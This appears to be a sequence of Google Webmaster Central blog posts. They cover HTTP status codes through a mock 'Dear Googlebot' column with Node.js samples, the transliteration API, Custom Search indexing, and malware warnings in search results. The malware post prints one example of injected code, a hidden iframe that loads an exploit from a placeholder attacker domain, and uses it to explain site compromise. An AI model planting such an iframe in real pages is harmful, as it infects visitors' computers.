
Our date with Googlebot was so wonderful, but it's hard to tell if we, the websites, said the right thing. We returned 301 permanent redirect, but should we have responded with 302 temporary redirect (so he knows we're playing hard to get)? If we sent a few new 404s, will he ever call our site again? Should we support the "If-Modified-Since" header? These questions can be confusing, just like young love. So without further ado, let's ask the expert, Googlebot, and find out how he judged our response (code).


Supporting the "If-Modified-Since" header and returning 304 can save bandwidth.


-----------
Dearest Googlebot,
  Recently, I did some spring cleaning on my site and deleted a couple of old, orphaned pages. They now return the 404 "Page not found" code. Is this ok, or have I confused you?
Frankie O'Fore

Dear Frankie,
  404s are the standard way of telling me that a page no longer exists. I won't be upset—it's normal that old pages are pruned from websites, or updated to fresher content. Most websites will show a handful of 404s in the Crawl Diagnostics over at Webmaster Tools. It's really not a big deal. As long as you have good site architecture with links to all your indexable content, I'll be happy, because it means I can find everything I need.

  But don't forget, it's not just me who comes to your website—there may be humans seeing these pages too. If you've only got a very simple '404 page not found' message, visitors who aren't as savvy could be baffled. There are lots of ways to make your 404 page more friendly; a quick one is our 404 widget over at Webmaster Tools, which will help direct people to content which does exist. For more information, you can read the blog post. Most web hosting companies, big and small, will let you customise your 404 page (and other return codes too).
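  One technical detail while we're on the subject: make sure your friendly error page is still served with the 404 status code, and not a 200, or I'll mistake the error page for real content. Here's a minimal sketch in Node.js of what I mean (the file layout and messages are placeholders, not anything specific to your site):

var http = require('http');
var fs = require('fs');

http.createServer(function (req, res) {
  var filePath = './public' + (req.url === '/' ? '/index.html' : req.url);
  fs.readFile(filePath, function (err, data) {
    if (err) {
      // A friendly message for humans, but the 404 status for crawlers;
      // serving this page with a 200 would make it look like real content.
      res.writeHead(404, { 'Content-Type': 'text/html' });
      res.end('<h1>Page not found</h1><p>Try the <a href="/">home page</a>.</p>');
    } else {
      res.writeHead(200, { 'Content-Type': 'text/html' });
      res.end(data);
    }
  });
}).listen(8080);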

Love and kisses,
Googlebot


Hey Googlebot,
  I was just reading your reply to Frankie above, and it raised a couple of questions.
What if I have someone linking to a page that no longer exists? How can I make sure my visitors still find what they're after? Also, what if I just move some pages around? I'd like to better organise my site, but I'm worried you'll get confused. How can I help you?
Yours hopefully,
Little Jimmy


Hello Jimmy,
   Let's pretend there are no anachronisms in your letter, and get to the meat of the matter. Firstly, let's look at links coming from other sites. Obviously, these can be a great source of traffic, and you don't want visitors presented with an unfriendly 'Page not found' message. So, you can harness the power of the mighty redirect.

   There are two types of redirect—301 and 302. Actually, there are lots more, but these are the two we'll concern ourselves with now. Just like 404, 301 and 302 are different types of response codes you can send to users and search engine crawlers. They're both redirects, but a 301 is permanent and a 302 is temporary. A 301 redirect tells me that whatever this page used to be, now it lives somewhere else. This is perfect for when you're re-organising your site, and also helps with links from offsite. Whenever I see a 301, I'll update all references to that old page with the new one you've told me about. Isn't that easy?

   If you don't know where to begin with redirects, let me get you started. It depends on your webserver, but here are some searches that may be helpful:
Apache: http://www.google.com/search?q=301+redirect+apache
IIS: http://www.google.com/search?q=301+redirect+iis
You can also check your manual, or the README files that came with your server.
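   If you handle requests in your own server-side code, a redirect is nothing more than a status code plus a Location header. Here's a minimal sketch in Node.js (the old and new paths are invented for illustration):

var http = require('http');

// Hypothetical mapping of retired URLs to their new homes.
var moved = {
  '/old-about.html': '/about/',
  '/products.php': '/products/'
};

http.createServer(function (req, res) {
  if (moved[req.url]) {
    // 301: the page has moved permanently, so I update my references.
    res.writeHead(301, { 'Location': moved[req.url] });
    res.end();
    return;
  }
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Hello from the current site.');
}).listen(8080);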

   As an alternative to a redirect, you can email the webmaster of the site linking to you and ask them to update their link. Not sure what sites are linking to you? Don't despair - my human co-workers have made that easy to figure out. In the "Links" portion of Webmaster Tools, you can enter a specific URL on your site to determine who's linking to it.

  My human co-workers also just released a tool which shows URLs linking to non-existent pages on your site. You can read more about that here.

Yours informationally,
Googlebot



Darling Googlebot,
   I have a problem—I live in a very dynamic part of the web, and I keep changing my mind about things. When you ask me questions, I never respond the same way twice—my top threads change every hour, and I get new content all the time! You seem like a straightforward guy who wants straightforward answers. How can I tell you when things change without confusing you?
Temp O'Rary


Dear Temp,
   I just told little Jimmy that 301s are the best way to tell a Googlebot about your new address, but what you're looking for is a 302.
   Once you're indexed, it's the polite way to tell your visitors that your address is still the right one, but that the content can temporarily be found elsewhere. In these situations, a 302 (or the rarer '307 Temporary Redirect') would be better. For example, orkut redirects from http://orkut.com to http://google.com/accounts/login?service=orkut, which isn't a page that humans would find particularly useful when searching for Orkut***. It's on a different domain, for starters. So, a 302 has been used to tell me that all the content and linking properties of the URL shouldn't be updated to the target - it's just a temporary page.

  That's why when you search for orkut, you see orkut.com and not that longer URL.
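  In code, by the way, the only difference from Jimmy's permanent case is the status number. A quick sketch in Node.js, with a made-up login path:

var http = require('http');

http.createServer(function (req, res) {
  if (req.url === '/') {
    // 302: the content is temporarily elsewhere, so I keep the indexing
    // and linking properties on the original URL.
    res.writeHead(302, { 'Location': '/login?service=example' });
    res.end();
    return;
  }
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Login page (placeholder).');
}).listen(8080);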

  Remember: simple communication is the key to any relationship.

Your friend,
Googlebot


*** Please note, I simplified the URL to make it easier to read. It's actually much more complex than that.

Captain Googlebot,
   I am the kind of site who likes to reinvent herself. I noticed that the links to me on my friends' sites are all to URLs I got rid of several redesigns ago! I had set up 301s to my new URLs for those pages, but after that I 301'ed the newer URLs to my next version. Now I'm afraid that if you follow their directions when you come to crawl, you'll end up following a string of 301s so long that by the end you won't come calling any more.
Ethel Binky


Dear Ethel,
   It sounds like you have set up some URLs that redirect to more redirects to... well, goodness! In small amounts, these "repeat redirects" are understandable, but it may be worth considering why you're using them in the first place. If you remove the 301s in the middle and send me straight to the final destination on all of them, you'll save both of us a bunch of time and HTTP requests. But don't just think of us. Other people get tired of seeing that same old 'contacting.... loading ... contacting...' game in their status bar.

   Put yourself in their shoes—if your string of redirects starts to look rather long, users might fear that you have set them off into an infinite loop! Bots and humans alike can get scared by that kind of "eternal commitment." Instead, try to get rid of those chained redirects, or at least keep 'em short. Think of the humans!
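   If you're not sure how long your chains have grown, you can trace them yourself. Here's a rough sketch using the fetch built into newer Node.js versions (the starting URL is a placeholder):

// Follow redirects one hop at a time and print the chain, so that
// chained 301s/302s can be collapsed into a single hop.
async function traceRedirects(url, maxHops) {
  for (var hop = 0; hop < maxHops; hop++) {
    var res = await fetch(url, { redirect: 'manual' });
    console.log(res.status + '  ' + url);
    if (res.status < 300 || res.status >= 400) return; // final destination
    // The Location header may be relative; resolve it against the current URL.
    url = new URL(res.headers.get('location'), url).toString();
  }
  console.log('Gave up after ' + maxHops + ' hops; possible loop?');
}

traceRedirects('http://www.example.com/old-page', 10);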

Yours thoughtfully,
Googlebot


Dear Googlebot,
   I know you must like me—you even ask me for unmodified files, like my college thesis that hasn't changed in 10 years. It's starting to be a real hassle! Is there anything I can do to prevent your taking up my lovely bandwidth?

Janet Crinklenose


Janet, Janet, Janet,
   It sounds like you might want to learn a new phrase—'304 Not Modified'. If I've seen a URL before, I include an 'If-Modified-Since' line in my request header, along with an HTTP-formatted date string. If you don't want to send me yet another copy of that file, stand up for yourself and send back a normal HTTP header with the status '304 Not Modified'! I like information, and this qualifies too. When you do that, there's no need to send me a copy of the file—which means you don't waste your bandwidth, and I don't feel like you're palming me off with the same old stuff.

   You'll probably notice that a lot of browsers and proxies will say 'If-Modified-Since' in their headers, too. You can be well on your way to curbing that pesky bandwidth bill.
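   Handling this in your own server-side code comes down to comparing the date I send against the file's modification time. A minimal sketch in Node.js (the file path is a placeholder, and sub-second precision is ignored for simplicity):

var http = require('http');
var fs = require('fs');

http.createServer(function (req, res) {
  var path = './thesis.html'; // hypothetical file that never changes
  fs.stat(path, function (err, stats) {
    if (err) { res.writeHead(404); res.end(); return; }
    var since = req.headers['if-modified-since'];
    // If the file hasn't changed since the date the client sent,
    // answer 304 with no body and save the bandwidth.
    if (since && stats.mtime <= new Date(since)) {
      res.writeHead(304);
      res.end();
      return;
    }
    res.writeHead(200, {
      'Content-Type': 'text/html',
      'Last-Modified': stats.mtime.toUTCString()
    });
    fs.createReadStream(path).pipe(res);
  });
}).listen(8080);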

Now go out there and save some bandwidth!
Good ol' Googlebot

-----------

Googlebot has been so helpful! Now we know how to best respond to users and search engines. The next time we get together, though, it's time to sit down for a good long heart-to-heart with the guy (Date with Googlebot: Part III is coming soon!).



UPDATE: Added a missing link. Thanks to Boris for pointing that out.

A lot has been said about how to start a multi-lingual site and how to better target content through meta tags. Our users have raised a number of interesting questions about creating websites in different languages, like the one below.

ganex:
> How does one do for INDIA.
> As there are many languages spoken here.
> My Site is primarily in English, but my site targets different cities in INDIA.
> For Hyderabad - I want in Urdu & Telugu and for Chennai I want in Tamil
> for Bengaluru I want in Kannada.
> For North I want in Hindi.

We'd like to introduce the transliteration API for Indic languages (languages spoken in India), in addition to our AJAX Language API. With this API at your disposal, content creation is simplified: it not only helps you integrate transliteration into your website but also lets visitors to your site type in Indic languages.

To include the transliteration API, first you need to load the AJAX script:

<script type="text/javascript" src="http://www.google.com/jsapi"></script>

This script tag loads the google.load function, which lets you load individual Google APIs. For the Google Transliteration API, the call to google.load looks like this:

<script type="text/javascript">
  google.load("elements", "1", {
    packages: "transliteration"
  });
</script>
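Once the package is loaded, you can make a text field transliteratable. The snippet below is a minimal sketch built on the API's TransliterationControl; the textarea id and the language pair are just examples:

<script type="text/javascript">
  google.setOnLoadCallback(function() {
    var options = {
      sourceLanguage: google.elements.transliteration.LanguageCode.ENGLISH,
      destinationLanguage: [google.elements.transliteration.LanguageCode.HINDI],
      transliterationEnabled: true
    };
    // Attach transliteration to the textarea with id="content" (example id).
    var control = new google.elements.transliteration.TransliterationControl(options);
    control.makeTransliteratable(['content']);
  });
</script>
<textarea id="content"></textarea>

With this in place, visitors can type words phonetically in English and have them appear in Hindi script as they type.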


When it comes to targeting, don't forget to add meta tags in your local language. And for your questions, we have a new addition to our existing communication channels like the webmaster help groups and Webmaster Tools (available in 26 languages!). We also have our own official Orkut webmaster community! Here users can share thoughts and discuss webmaster-related issues.

Sign up for our Orkut community now and if you have any additional thoughts we'd love to hear about them.

Cheers,

Since we launched enhanced indexing with the Custom Search platform earlier this year, webmasters who submit Sitemaps to Webmaster Tools get special treatment: Custom Search recognizes the submitted Sitemaps and indexes URLs from these Sitemaps into a separate index for higher quality Custom Search results. We analyze your Custom Search Engines (CSEs), pick up the appropriate Sitemaps, and figure out which URLs are relevant for your engines for enhanced indexing. You get the dual benefit of better discovery for Google.com and more comprehensive coverage in your own CSEs.

Today, we're taking another step towards improving your experience with Google webmaster services with the launch of On-Demand Indexing in Custom Search. With On-Demand Indexing, you can now tell us about the pages on your websites that are new, or that are important and have changed, and Custom Search will instantly schedule them for crawl, and index and serve them in your CSEs usually within 24 hours, often much faster.

How do you tell us about these URLs? You guessed it... provide a Sitemap to Webmaster Tools, like you always do, and tell Custom Search about it. Just go to the CSE control panel, click on the Indexing tab, select your On-Demand Sitemap, and hit the "Index Now" button. You can tell us which of these URLs are most important to you via the priority and lastmod attributes that you provide in your Sitemap. Each CSE has a number of pages allocated within the On-Demand Index, and with these attributes, you can tell us which are most important for indexing. If you need greater allocation in the On-Demand index, as well as more customization controls, Google Site Search provides a range of options.
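As a reminder, priority and lastmod are per-URL elements inside the Sitemap file itself. A minimal example (the URLs and dates are placeholders):

<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://www.example.com/new-article</loc>
    <lastmod>2008-10-20</lastmod>
    <priority>0.9</priority>
  </url>
  <url>
    <loc>http://www.example.com/archive/old-post</loc>
    <lastmod>2007-03-15</lastmod>
    <priority>0.3</priority>
  </url>
</urlset>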


Some important points to remember:
  1. You only need to submit your Sitemaps once in Webmaster Tools. Custom Search will automatically list the Sitemaps submitted via Webmaster Tools and you can decide which Sitemap to select for On-Demand Indexing.
  2. Your Sitemap needs to be for a website verified in Webmaster Tools, so that we can verify ownership of the right URLs.
  3. In order for us to index these additional pages, our crawlers must be able to crawl them. You can use "Webmaster Tools > Crawl Errors > URLs restricted by robots.txt" or check your robots.txt file to ensure that you're not blocking us from crawling these pages.
  4. Submitting pages for On-Demand Indexing will not make them appear any faster in the main Google index, or impact ranking on Google.com.
We hope you'll use this feature to inform us regularly of the most important changes on your sites, so we can respond quickly and get those pages indexed in your CSE. As always, we're listening for your feedback on Custom Search.

Note: The SEO Starter Guide has since been updated.

Webmasters often ask us at conferences or in the Webmaster Help Group, "What are some simple ways that I can improve my website's performance in Google?" There are lots of possible answers to this question, and a wealth of search engine optimization information on the web, so much that it can be intimidating for newer webmasters or those unfamiliar with the topic. We thought it'd be useful to create a compact guide that lists some best practices that teams within Google and external webmasters alike can follow that could improve their sites' crawlability and indexing.

Our Search Engine Optimization Starter Guide covers around a dozen common areas that webmasters might consider optimizing. We felt that these areas (like improving title and description meta tags, URL structure, site navigation, content creation, anchor text, and more) would apply to webmasters of all experience levels and sites of all sizes and types. Throughout the guide, we also worked in many illustrations, pitfalls to avoid, and links to other resources that help expand our explanation of the topics. We plan on updating the guide at regular intervals with new optimization suggestions and to keep the technical advice current.

So, the next time we get the question, "I'm new to SEO, how do I improve my site?", we can say, "Well, here's a list of best practices that we use inside Google that you might want to check out."

Update on July 22, 2009: The SEO Starter Guide is now available in 40 languages!


hotdog

lion king
...and infinitely more fun: webmasters and their pets incognito! Happy Halloween, everyone! If you see any costumes that would pass the SafeSearch filter :), or feel like sharing a gripe or telling a good story, please join the chat!

Take care, and don't forget to brush your teeth.
 Yours scarily,
  The Webmaster Central Team


Our glasses-wearing, no vampire-teeth vampire (Ryan), zombie Mur, Holiday Fail (Tiffany Lane), Colbert Hipster (Dan Vanderkam), Rick Astley Cutts, Homeboy Ben D'Angelo, Me -- pinker & poofier, Investment Bank CEO Shyam Jayaraman (though you can't see the golden parachute in his backpack)



Chark as Juno, Wysz as Beah Burger (our co-worker), Adi and Matt Dougherty as yellow ninja, red ninja!


Heroes come in all shapes and sizes...

Powdered toast man, Mike Leotta

Adam Lasnik as, let me see if I get this right, a "secret service agent masquerading as a backstage tech" :)

What featured over 750 webmasters and a large number of Googlers from around the world, hundreds of questions, and over one hundred answers over the course of nearly two hours?  If you guessed "the Tricks and Treats webmaster event from earlier this month!" well, you're either absolutely brilliant, you read the title of this post, or both!

How did it go?
It was an exhilarating, exhausting, and educational event, if we may say so ourselves, even though there were a few snafus.  We're aware that the sound quality wasn't great for some folks, and we appreciate the helpful constructive criticism in this feedback thread.  Last but not least, we are bummed to admit that someone (whose name starts with 'A' and ends with 'M') uncharacteristically forgot to hit the record button (really!), so there's unfortunately no audio recording to share :-(.

But on more positive notes, we're delighted that so many of you enjoyed our presentations (embedded below), our many answers, and even some of our bad jokes (mercifully not to be repeated).

What next?
Well, for starters, all of us Webmaster Central Googlers will be spending quite some time taking in your feedback.  Some of you have requested sessions exclusively covering particular (pre-announced) topics or tailored to specific experience levels, and we've also heard from many webmasters outside of the U.S. who would love online events in other languages and at more convenient times.  No promises, but you can bet we're eager to please!  Stay tuned on this blog (and, as a hint and hallo to our German-speaking webmasters, do make sure to follow our German webmaster blog  ;-).  

And finally, a big thank you!
A heartfelt thank you to my fellow Googlers, many of whom got up at the crack of dawn to get to the office early for the chat and previous day's runthrough or stayed at work late in Europe.  But more importantly, major props to all of you (from New Delhi, New York, New Zealand and older places) who asked great questions and hung out with us online for up to two hours.  You webmasters are the reason we love coming to work each day, and we look forward to our next chat!

*  *  *

The presentations...
We had presentations from John, Jonathan, Maile, and Wysz.  Presentations from the first three are embedded below (Wysz didn't have a written presentation this time).


John's slides on "Frightening Webmastering Myths"


Jonathan's slides on "Using the Not Found errors report in Webmaster Tools"


Maile's slides on "Where We're Coming From"


Edited on Wednesday, October 29 at 6:00pm to update number of participants

(Cross-posted from the Google Online Security Blog.)

"This site may harm your computer"
You may have seen those words in Google search results — but what do they mean? If you click the search result link you get another warning page instead of the website you were expecting. But if the web page was your grandmother's baking blog, you're still confused. Surely your grandmother hasn't been secretly honing her l33t computer hacking skills at night school. Google must have made a mistake and your grandmother's web page is just fine...

I work with the team that helps put the warning in Google's search results, so let me try to explain. The good news is that your grandmother is still kind and loves turtles. She isn't trying to start a botnet or steal credit card numbers. The bad news is that her website or the server that it runs on probably has a security vulnerability, most likely from some out-of-date software. That vulnerability has been exploited and malicious code has been added to your grandmother's website. It's most likely an invisible script or iframe that pulls content from another website that tries to attack any computer that views the page. If the attack succeeds, then viruses, spyware, key loggers, botnets, and other nasty stuff will get installed.
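For instance, the injected code often looks something like this hypothetical snippet: a zero-size iframe tucked into an otherwise normal page, invisible to visitors but active in their browsers (the domain is made up):

<!-- Hypothetical example of injected malware: an invisible iframe
     that silently loads attack code from another site. -->
<iframe src="http://evil-example.com/exploit" width="0" height="0" frameborder="0"></iframe>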

If you see the warning on a site in Google's search results, it's a good idea to pay attention to it. Google has automatic scanners that are constantly looking for these sorts of web pages. I help build the scanners and continue to be surprised by how accurate they are. There is almost certainly something wrong with the website even if it is run by someone you trust. The automatic scanners make unbiased decisions based on the malicious content of the pages, not the reputation of the webmaster.

Servers are just like your home computer and need constant updating. There are lots of tools that make building a website easy, but each one adds some risk of being exploited. Even if you're diligent and keep all your website components updated, your web host may not be. They control your website's server and may not have installed the most recent OS patches. And it's not just innocent grandmothers that this happens to. There have been warnings on the websites of banks, sports teams, and corporate and government websites.

Uh-oh... I need help!
Now that we understand what the malware label means in search results, what do you do if you're a webmaster and Google's scanners have found malware on your site?

There are some resources to help clean things up. The Google Webmaster Central blog has some tips and a quick security checklist for webmasters. Stopbadware.org has great information, and their forums have a number of helpful and knowledgeable volunteers who may be able to help (sometimes I'm one of them). You can also use the Google SafeBrowsing diagnostics page for your site (http://www.google.com/safebrowsing/diagnostic?site=<site-name-here>) to see specific information about what Google's automatic scanners have found. If your site has been flagged, Google's Webmaster Tools lists some of the URLs that were scanned and found to be infected.

Once you've cleaned up your website, use Google's Webmaster Tools to request a malware review. The automatic systems will rescan your website and the warning will be removed if the malware is gone.

Advance warning
I often hear webmasters asking Google for advance warning before a malware label is put on their website. When the label is applied, Google usually emails the website owners and then posts a warning in Google's Webmaster Tools. But no warning is given ahead of time, so a webmaster can't quickly clean up the site before the label appears.

But, look at the situation from the user's point of view. As a user, I'd be pretty annoyed if Google sent me to a site it knew was dangerous. Even a short delay would expose some users to that risk, and it doesn't seem justified. I know it's frustrating for a webmaster to see a malware label on their website. But, ultimately, protecting users against malware makes the internet a safer place and everyone benefits, both webmasters and users.

Google's Webmaster Tools has started a test to provide warnings to webmasters that their server software may be vulnerable. Responding to that warning and updating server software can prevent your website from being compromised with malware. The best way to avoid a malware label is to never have any malware on the site!

Reviews
You can request a review via Google's Webmaster Tools and you can see the status of the review there. If you think the review is taking too long, make sure to check the status. Finding all the malware on a site is difficult and the automated scanners are far more accurate than humans. The scanners may have found something you've missed and the review may have failed. If your site has a malware label, Google's Webmaster Tools will also list some sample URLs that have problems. This is not a full list of all of the problem URLs (because that's often very, very long), but it should get you started.

Finally, don't confuse a malware review with a request for reconsideration. If Google's automated scanners find malware on your website, the site will usually not be removed from search results. There is also a different process that removes spammy websites from Google search results. If that's happened and you disagree with Google, you should submit a reconsideration request. But if your site has a malware label, a reconsideration request won't do any good — for malware you need to file a malware review from the Overview page.

How long will a review take?
Webmasters are eager to have a Google malware label removed from their site and often ask how long a review of the site will take. Both the original scanning and the review process are fully automated. The systems analyze large portions of the internet, which is a big place, so the review may not happen immediately. Ideally, the label will be removed within a few hours. At its longest, the process should take a day or so.